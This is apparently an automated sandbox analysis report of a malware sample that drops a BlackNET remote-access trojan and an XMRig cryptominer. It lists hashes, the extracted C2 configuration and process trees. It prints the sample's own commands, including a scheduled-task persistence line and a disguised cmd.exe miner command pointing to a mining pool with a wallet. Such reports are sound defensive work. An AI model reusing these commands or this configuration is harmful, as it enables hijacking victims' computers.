Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
23-07-2021 00:06
Static task
static1
Behavioral task
behavioral1
Sample
4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
Resource
win7v20210410
General
-
Target
4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe
-
Size
3.2MB
-
MD5
af711c6269728cc41a4b6cab99dc00d2
-
SHA1
02a1cff69f43552c5aa6fea7547e5f68018dbc84
-
SHA256
4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c
-
SHA512
94b6ba8fcdbb5dd175096e305698a41078fb1a99725610bb49159d02ccf2484b01fd7bfcf48fb4644af6b92c77453855f7eba46445f93ff449317f25613bb8a6
Malware Config
Extracted
blacknet
v3.7.0 Public
OTwjgZ
http://54.237.66.139
BN[a4bfa882efc194e2bcd370ea]
-
antivm
false
-
elevate_uac
false
-
install_name
WindowsUpdate.exe
-
splitter
|BN|
-
start_name
19eb68018edbdeae69b26450d3d0915f
-
startup
false
-
usb_spread
false
Signatures
-
BlackNET Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp family_blacknet behavioral2/memory/1568-125-0x000000000063636E-mapping.dmp family_blacknet C:\Users\Admin\AppData\Local\Temp\phone.exe family_blacknet C:\Users\Admin\AppData\Local\Temp\phone.exe family_blacknet -
Contains code to disable Windows Defender 4 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmp disable_win_def behavioral2/memory/1568-125-0x000000000063636E-mapping.dmp disable_win_def C:\Users\Admin\AppData\Local\Temp\phone.exe disable_win_def C:\Users\Admin\AppData\Local\Temp\phone.exe disable_win_def -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1808-188-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/1808-189-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/1808-191-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
cmd.exeflow pid process 19 1808 cmd.exe 21 1808 cmd.exe -
Executes dropped EXE 5 IoCs
Processes:
phone.exephoneupdate.exesihost64.exeuserupdate.exesihost64.exepid process 488 phone.exe 3852 phoneupdate.exe 764 sihost64.exe 644 userupdate.exe 1508 sihost64.exe -
Uses the VBS compiler for execution 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exeuserupdate.exedescription pid process target process PID 992 set thread context of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 644 set thread context of 1808 644 userupdate.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3544 schtasks.exe 2796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exephone.exephoneupdate.exeuserupdate.exepid process 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 488 phone.exe 3852 phoneupdate.exe 3852 phoneupdate.exe 644 userupdate.exe 644 userupdate.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exephone.exephoneupdate.exeuserupdate.execmd.exedescription pid process Token: SeDebugPrivilege 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe Token: SeDebugPrivilege 488 phone.exe Token: SeDebugPrivilege 3852 phoneupdate.exe Token: SeDebugPrivilege 644 userupdate.exe Token: SeLockMemoryPrivilege 1808 cmd.exe Token: SeLockMemoryPrivilege 1808 cmd.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
phone.exepid process 488 phone.exe 488 phone.exe -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exevbc.exephoneupdate.execmd.exeuserupdate.execmd.exedescription pid process target process PID 992 wrote to memory of 2268 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 2268 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 2268 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 992 wrote to memory of 1568 992 4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe vbc.exe PID 1568 wrote to memory of 488 1568 vbc.exe phone.exe PID 1568 wrote to memory of 488 1568 vbc.exe phone.exe PID 1568 wrote to memory of 3852 1568 vbc.exe phoneupdate.exe PID 1568 wrote to memory of 3852 1568 vbc.exe phoneupdate.exe PID 3852 wrote to memory of 408 3852 phoneupdate.exe cmd.exe PID 3852 wrote to memory of 408 3852 phoneupdate.exe cmd.exe PID 408 wrote to memory of 3544 408 cmd.exe schtasks.exe PID 408 wrote to memory of 3544 408 cmd.exe schtasks.exe PID 3852 wrote to memory of 764 3852 phoneupdate.exe sihost64.exe PID 3852 wrote to memory of 764 3852 phoneupdate.exe sihost64.exe PID 3852 wrote to memory of 644 3852 phoneupdate.exe userupdate.exe PID 3852 wrote to memory of 644 3852 phoneupdate.exe userupdate.exe PID 644 wrote to memory of 2204 644 userupdate.exe cmd.exe PID 644 wrote to memory of 2204 644 userupdate.exe cmd.exe PID 2204 wrote to memory of 2796 2204 cmd.exe schtasks.exe PID 2204 wrote to memory of 2796 2204 cmd.exe schtasks.exe PID 644 wrote to memory of 1508 644 userupdate.exe sihost64.exe PID 644 wrote to memory of 1508 644 userupdate.exe sihost64.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe PID 644 wrote to memory of 1808 644 userupdate.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe"C:\Users\Admin\AppData\Local\Temp\4ff431768417c7103657b6554962998af3b2f90180e6f19e66e671b4f706061c.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"{path}"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"{path}"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\phone.exe"C:\Users\Admin\AppData\Local\Temp\phone.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe"C:\Users\Admin\AppData\Local\Temp\phoneupdate.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\userupdate.exe"C:\Users\Admin\AppData\Roaming\userupdate.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "userupdate" /tr '"C:\Users\Admin\AppData\Roaming\userupdate.exe"'6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exeC:\Windows/System32\cmd.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.c3pool.com:13333 --user=439KJy5uZoHFetfkQ45pdjRnjLzN1TsFn2NLxPcZbTMwTqJGGpJw4SEM4NhUygc7xacM16VKBNq2Hfe52KmiWTpE46UsCLH --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\phone.exeMD5
a18b7cb1fe97912ffc3e38d76ccc0462
SHA1c5908c111223d69f532973643381983ba385c1c1
SHA2562d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f
SHA512d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c
-
C:\Users\Admin\AppData\Local\Temp\phone.exeMD5
a18b7cb1fe97912ffc3e38d76ccc0462
SHA1c5908c111223d69f532973643381983ba385c1c1
SHA2562d5e2831e24496bd74a7a2317f824657905cdadaeb00f5c6e33e9b75c5231a2f
SHA512d92025f6eb3ab4a594113813284361694ce1b78cfd513d88f4ea842ea7d37c91976066b33089c4da048e39cc4c65654637d2a14138327df40f89d4bb0963be1c
-
C:\Users\Admin\AppData\Local\Temp\phoneupdate.exeMD5
c169f9a4c5c32e4ceb4ff58d1c86e969
SHA18cdad283c3c44202cb3dc50928d8f80ce885715c
SHA256aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6
SHA5123c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b
-
C:\Users\Admin\AppData\Local\Temp\phoneupdate.exeMD5
c169f9a4c5c32e4ceb4ff58d1c86e969
SHA18cdad283c3c44202cb3dc50928d8f80ce885715c
SHA256aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6
SHA5123c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sysMD5
0c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
94de80b9dbb3379c59a370b83bbffd90
SHA19b65d5fba13c1174af142de9fdb17cd9989332fc
SHA2565808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b
SHA5121fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
94de80b9dbb3379c59a370b83bbffd90
SHA19b65d5fba13c1174af142de9fdb17cd9989332fc
SHA2565808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b
SHA5121fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
94de80b9dbb3379c59a370b83bbffd90
SHA19b65d5fba13c1174af142de9fdb17cd9989332fc
SHA2565808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b
SHA5121fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
94de80b9dbb3379c59a370b83bbffd90
SHA19b65d5fba13c1174af142de9fdb17cd9989332fc
SHA2565808a167ef048cca53662ca6d02d9325c7c7943baedf962e4c77803f04d39c9b
SHA5121fdce23f2d8c6d0dd9d69e055028440e408e8c8eaf6f5c0371803e225b37be14e97614adb2cea36f0958f077a53ec27477d7b856cfc1d4284514f2e795a0bea7
-
C:\Users\Admin\AppData\Roaming\userupdate.exeMD5
c169f9a4c5c32e4ceb4ff58d1c86e969
SHA18cdad283c3c44202cb3dc50928d8f80ce885715c
SHA256aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6
SHA5123c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b
-
C:\Users\Admin\AppData\Roaming\userupdate.exeMD5
c169f9a4c5c32e4ceb4ff58d1c86e969
SHA18cdad283c3c44202cb3dc50928d8f80ce885715c
SHA256aa7017fd7ec87d6f3abfe5b52b62b36936312a9ad280ebe74769a096cb2b06a6
SHA5123c6fe017bd76b12db3a91fdef1b673c1062a601c6863c41ac2320a1727376af54d5bae9f9237f8f5b554f7fe39852ef550feef15b5b8c125060d6cc5fff4d01b
-
memory/408-162-0x0000000000000000-mapping.dmp
-
memory/488-156-0x000002B777510000-0x000002B777512000-memory.dmpFilesize
8KB
-
memory/488-141-0x0000000000000000-mapping.dmp
-
memory/488-148-0x000002B75CF50000-0x000002B75CF51000-memory.dmpFilesize
4KB
-
memory/488-159-0x000002B777515000-0x000002B777517000-memory.dmpFilesize
8KB
-
memory/488-158-0x000002B777512000-0x000002B777513000-memory.dmpFilesize
4KB
-
memory/488-157-0x000002B777513000-0x000002B777514000-memory.dmpFilesize
4KB
-
memory/644-180-0x00000000013D0000-0x00000000013D1000-memory.dmpFilesize
4KB
-
memory/644-177-0x000000001C620000-0x000000001C622000-memory.dmpFilesize
8KB
-
memory/644-167-0x0000000000000000-mapping.dmp
-
memory/644-187-0x00000000013C0000-0x00000000013CA000-memory.dmpFilesize
40KB
-
memory/764-168-0x0000000000780000-0x0000000000781000-memory.dmpFilesize
4KB
-
memory/764-164-0x0000000000000000-mapping.dmp
-
memory/764-176-0x000000001C2A0000-0x000000001C2A2000-memory.dmpFilesize
8KB
-
memory/764-174-0x0000000000F90000-0x0000000000F92000-memory.dmpFilesize
8KB
-
memory/992-122-0x0000000005DE0000-0x0000000006076000-memory.dmpFilesize
2.6MB
-
memory/992-121-0x0000000004690000-0x0000000004692000-memory.dmpFilesize
8KB
-
memory/992-116-0x0000000007530000-0x0000000007531000-memory.dmpFilesize
4KB
-
memory/992-117-0x00000000070D0000-0x00000000070D1000-memory.dmpFilesize
4KB
-
memory/992-118-0x0000000007030000-0x000000000752E000-memory.dmpFilesize
5.0MB
-
memory/992-119-0x0000000007230000-0x0000000007231000-memory.dmpFilesize
4KB
-
memory/992-120-0x0000000009510000-0x0000000009511000-memory.dmpFilesize
4KB
-
memory/992-114-0x0000000000090000-0x0000000000091000-memory.dmpFilesize
4KB
-
memory/992-123-0x0000000006510000-0x0000000006754000-memory.dmpFilesize
2.3MB
-
memory/1508-181-0x0000000000000000-mapping.dmp
-
memory/1508-196-0x000000001BF00000-0x000000001BF02000-memory.dmpFilesize
8KB
-
memory/1568-124-0x0000000000400000-0x000000000063C000-memory.dmpFilesize
2.2MB
-
memory/1568-136-0x0000000009C60000-0x0000000009C61000-memory.dmpFilesize
4KB
-
memory/1568-125-0x000000000063636E-mapping.dmp
-
memory/1568-134-0x0000000009AA0000-0x0000000009F9E000-memory.dmpFilesize
5.0MB
-
memory/1808-194-0x00000193343C0000-0x00000193343E0000-memory.dmpFilesize
128KB
-
memory/1808-197-0x00000193343E0000-0x0000019334400000-memory.dmpFilesize
128KB
-
memory/1808-188-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1808-189-0x00000001402EB66C-mapping.dmp
-
memory/1808-191-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1808-190-0x0000019332AE0000-0x0000019332B00000-memory.dmpFilesize
128KB
-
memory/2204-178-0x0000000000000000-mapping.dmp
-
memory/2796-179-0x0000000000000000-mapping.dmp
-
memory/3544-163-0x0000000000000000-mapping.dmp
-
memory/3852-161-0x000000001C2F0000-0x000000001C2F2000-memory.dmpFilesize
8KB
-
memory/3852-160-0x000000001C700000-0x000000001C91B000-memory.dmpFilesize
2.1MB
-
memory/3852-153-0x0000000000490000-0x0000000000491000-memory.dmpFilesize
4KB
-
memory/3852-150-0x0000000000000000-mapping.dmp